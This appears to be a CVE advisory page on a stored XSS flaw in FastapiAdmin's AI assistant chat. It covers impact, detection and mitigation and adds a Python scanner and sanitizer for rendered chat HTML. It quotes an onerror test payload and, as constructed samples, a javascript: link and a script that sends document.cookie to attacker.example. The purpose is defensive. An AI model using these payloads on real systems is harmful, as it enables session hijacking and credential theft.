CVE-2026-36728
Status: Received - Intake
BaseFortify

Publication date: 2026-06-09

Last updated on: 2026-06-09

Assigner: MITRE

Description
A markdown based cross-site scripting (XSS) vulnerability in the AI assistant chat function of FastapiAdmin v2.2.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a chat message.
Meta Information
Published: 2026-06-09
Last Modified: 2026-06-09
Generated: 2026-06-10
AI Q&A: 2026-06-09
EPSS Evaluated: N/A
Affected Vendors & Products
Showing 2 associated CPEs
Vendor          Product         Version / Range
fastapiadmin    fastapiadmin    2.2.0
fastapiadmin    fastapiadmin    up to 2.2.0 (exclusive), i.e. all earlier versions
CWE
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Executive Summary

This vulnerability is a markdown-based, stored Cross-Site Scripting (XSS) issue in the AI assistant chat function of FastapiAdmin version 2.2.0 and earlier.

It occurs because user-supplied chat messages are stored without sanitization or validation and then rendered on the frontend with the markdown-it library, whose HTML output is injected into the page with v-html. markdown-it is a parser, not a sanitizer: with raw HTML allowed, tags and event-handler attributes in a message pass through to the rendered output unchanged, and nothing strips them before the browser executes them.

As a result, an attacker who can post chat messages (normally an authenticated user of the admin panel) can inject JavaScript that executes in the browser of every user who later views those messages.

Impact Analysis

Because the payload is stored with the message, it fires for every user who opens the conversation, not only the one who submitted it, and in an admin panel those viewers are typically administrators.

The script runs in the victim's browser with the victim's session, so an attacker can hijack the session, steal credentials or tokens, read data shown in the panel, and perform any action the victim is authorized to perform.

Detection Guidance

This vulnerability can be confirmed by testing the AI assistant chat function of FastapiAdmin for execution of a markdown-based XSS payload: send a chat message containing a payload such as <img src=x onerror='alert(1)' /> and check whether the script runs when the message is rendered, both for the sender and for another user who opens the same conversation (the message is stored, so the second check separates a stored XSS from a reflected one).

In the code, look for message content that is saved without sanitization and rendered through v-html from markdown-it's output. markdown-it only passes raw HTML tags through when it is instantiated with its html option enabled; if the test payload shows up as literal text instead of executing, that option is off and the raw-tag vector does not apply, although markdown constructs such as links are still worth checking for javascript: URLs.

No specific commands are provided; a practical approach is to send test messages through the web interface and watch for the alert, for unexpected outbound requests in the browser's network tab, or for new DOM nodes in the chat view.

Mitigation Strategies

Immediate mitigation is to sanitize the HTML that markdown-it produces before it is bound with v-html, for example with DOMPurify. Sanitize after markdown rendering, not before: markdown syntax can reconstruct tags and attributes that a pre-render filter removed. Storing only the raw markdown and sanitizing at render time keeps the stored data intact.

Alternatively, switching to a markdown editor with built-in XSS filtering, such as mavonEditor, reduces the risk.

Deploying a Content Security Policy (CSP) limits the damage of any remaining injection. The inline onerror handler in the test payload is blocked only if script-src does not include 'unsafe-inline', so a nonce- or hash-based policy is needed for the header to be effective against this class of bug.
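The following is an added example that is not FastapiAdmin code and not code from this page; it serves both the Detection Guidance and Mitigation Strategies sections. It treats the input as the HTML string a markdown renderer such as markdown-it hands to the frontend, runs the detection check (event-handler attributes, executable tags, unsafe URL schemes) over constructed sample messages, and then applies an allowlist sanitizer of the kind DOMPurify performs. The sanitizer is written against the Python standard library only so it runs offline; in the real fix the browser should call DOMPurify.sanitize() on the rendered string before v-html, and this stand-in is an illustration of the rules, not a replacement for a maintained library. All sample messages and helper names are constructed for this example.

```python
"""Added example (not FastapiAdmin code): detect executable constructs in
rendered chat HTML and neutralize them with an allowlist. Assumes the input
is the HTML string a markdown renderer emits; samples are constructed."""
from html import escape
from html.parser import HTMLParser

# Tags a rendered chat message may legitimately contain.
ALLOWED_TAGS = {"p", "br", "strong", "em", "code", "pre", "ul", "ol", "li",
                "blockquote", "a", "img"}
# Attributes kept per tag; everything else, including every on* handler, is dropped.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")  # javascript:/data: are not here
VOID_TAGS = {"br", "img"}
# Tags whose presence in chat HTML is itself a detection finding.
DANGEROUS_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
                  "style", "link", "meta", "base", "form"}
URL_ATTRS = {"href", "src", "action", "formaction"}


def _safe_url(value):
    """True for relative URLs and for SAFE_SCHEMES. Browsers drop tabs, newlines
    and leading control characters before parsing, so "java\\tscript:" still
    runs; normalize the same way before looking at the scheme."""
    v = "".join(c for c in value.lower() if not c.isspace() and ord(c) > 0x1F)
    head = v.split("/", 1)[0].split("?", 1)[0].split("#", 1)[0]
    if ":" not in head:
        return True  # no scheme at all: a relative URL
    return v.startswith(SAFE_SCHEMES)


class _Scanner(HTMLParser):
    """Detection check: records what in the HTML could execute script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"<{tag}> tag")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name}= handler on <{tag}>")
            elif name in URL_ATTRS and value and not _safe_url(value):
                self.findings.append(f"unsafe {name} on <{tag}>")


def find_xss_constructs(html):
    """Return the list of findings; empty means nothing executable was seen."""
    scanner = _Scanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


class _Sanitizer(HTMLParser):
    """Allowlist rewrite: unknown tags are dropped (their text is kept), script
    and style bodies are removed entirely, attributes are filtered and
    re-quoted, and text is re-escaped."""

    def __init__(self):
        super().__init__()
        self.out, self.open_tags, self.skip_depth = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1  # drop the body, not just the tag
            return
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src") and not _safe_url(value or ""):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        if tag == "a":
            kept.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in self.open_tags:
            while self.open_tags:  # also close anything left open inside it
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.close()
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_html(html):
    """Return HTML containing only allowlisted tags, attributes and URL schemes."""
    s = _Sanitizer()
    s.feed(html)
    return s.result()


# Constructed sample messages, written as the HTML a markdown renderer would
# emit for them (not real FastapiAdmin traffic).
SAMPLE_MESSAGES = {
    "benign": '<p>Deploy is done, see <a href="https://example.com/run/42">the run</a>.</p>',
    "page_payload": "<img src=x onerror='alert(1)' />",
    "js_link": '<p><a href="javas\tcript:alert(document.cookie)">click me</a></p>',
    "script_tag": "<p>hi</p><script>fetch('https://attacker.example/?c='+document.cookie)</script>",
}

if __name__ == "__main__":
    for name, html in SAMPLE_MESSAGES.items():
        print(f"{name:13} findings={find_xss_constructs(html)}")
        print(f"{'':13} sanitized={sanitize_html(html)!r}")
```

Running the block prints, for each sample, what the scanner flagged and what survives sanitization: the page's img payload loses its onerror attribute, the tab-obfuscated javascript: link loses its href, and the script body disappears rather than being escaped into visible text. The scanner is also a useful regression check on the sanitizer's output, which is what the last assertion in a test would cover.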
